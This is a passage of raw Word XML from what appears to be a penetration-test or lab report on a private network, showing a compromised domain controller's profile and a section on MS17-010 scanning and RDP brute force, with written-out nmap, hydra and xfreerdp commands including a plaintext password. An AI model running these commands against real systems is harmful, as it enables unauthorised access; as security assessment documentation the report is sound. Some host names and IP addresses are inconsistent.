          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig. </w:t>
      </w:r>
      <w:r w:rsidR="00453791" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F016B3" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Full system profile of the host which has been compromised.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable1Light"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="6662"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="4C048A09" w14:textId="77777777" w:rsidTr="00453791">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689" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="239DCB19"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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7785330E" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1"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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="0D7FF49C" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65304F1D"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Host Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0957EF32"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WIN-LNR0KG2GM9D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="5EAE6769" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00D7B4EE"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OS Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E44C109"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Microsoft Windows Server 2019 Standard Evaluation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="0D4FCE5F" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63C21729"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OS Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27FF6EF1"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10.0.17763 Build 17763</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="0E354A9D" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49ACDC8A"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OS Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="079585A9"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Primary Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="62E7B710" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D7C0E93"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System Manufacturer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B47F752"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VMware, Inc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="27EFF1C3" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E66DC71"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System Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B23D003"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VMware20,1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="45C5FE82" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B1A8441"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Total Physical Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03509738"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2,047 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="59C861A1" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57C19FCA"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Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A1BDBB4"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cs.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="4413BD35" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77564423"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Logon Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4380ED13"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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="7781DEF9" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="444E62C9"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Hotfix(es)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E308C45"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3 installed (KB5020022, KB5019966, KB5020374)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="634B8FB4" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C53E13B"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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48F46821" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>192.168.174.155</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0689B451" w14:textId="77777777" w:rsidR="00D22F4D" w:rsidRPr="00C668B5" w:rsidRDefault="00D22F4D" w:rsidP="00D22F4D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical Finding: The affected machine is a Primary Domain Controller that is operating windows server 2019. NT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>AUTHORity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>/SYSTEM access to a Domain Controller gives full control of the domain of cas.org Active directory - such as the capability to dump all domain credential hashes (DCSync attack), debug new privileged user accounts and continue to exist indefinitely on domain-joined systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7174057A" w14:textId="30ECC68C" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.3 Exploit C — MS17-010 / RDP Credential Attack (Windows 10, T1110)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A86E3C" w14:textId="77777777" w:rsidR="00D22F4D" w:rsidRPr="00C668B5" w:rsidRDefault="00D22F4D" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">A preliminary test to an SMBv1 vulnerability was conducted on the Windows 10 endpoint (192.168.174.136) to identify whether the MS17-010 attack vector still existed. An alternative initial access method based on the existence of weak administrator credentials (a weakness formally classified under MITRE ATT&amp;CK technique T1110 (Brute Force)) was used in the event that the host was identified as having been patched against </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and involved a brute-force attack using a credential-based Remote Desktop Protocol (RDP) attack. [12]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6672E6" w14:textId="0E0CA87D" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 445,3389 --script smb-vuln-ms17-010 192.168.174.148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6852A7C3" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>hydra -l Administrator -P passlist.txt rdp://192.168.174.136 -t 4 -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5256B772" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="279D7A54" wp14:editId="5F6AB025">
            <wp:extent cx="5943600" cy="3518535"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="2193744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374407" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3518535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C8847A" w14:textId="6C012B7A" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Fig. 1</w:t>
      </w:r>
      <w:r w:rsidR="00F016B3" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Nmap scan of 192.168.174.136 with some port 445 and 3389 open with SMB vulnerability assessment result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FFAA0C" w14:textId="1A7535D0" w:rsidR="00D22F4D" w:rsidRPr="00C668B5" w:rsidRDefault="00D22F4D" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Within this, regardless of the initial access vector used, successful authentication into the endpoint of Windows 10 was achieved and post-exploitation enumeration was performed to illustrate the ability of the adversary to control the compromised workstation. Confirmation of the access was proved by the execution of the commands which demonstrated the control over the security context by the attacker, listing of the local users accounts as well as accessing a directory listing within the Administrator profile path [13].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A39A810" w14:textId="75F2F721" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>u:Unknown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>p:Hello</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>@123 /v:192.168.174.148 +clipboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F14841"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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AF46E29" wp14:editId="2E32D1E5">
            <wp:extent cx="5943600" cy="3533775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6900557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0055796" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3533775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E59B7B" w14:textId="55C714CE" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00D22F4D" w:rsidP="00D22F4D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
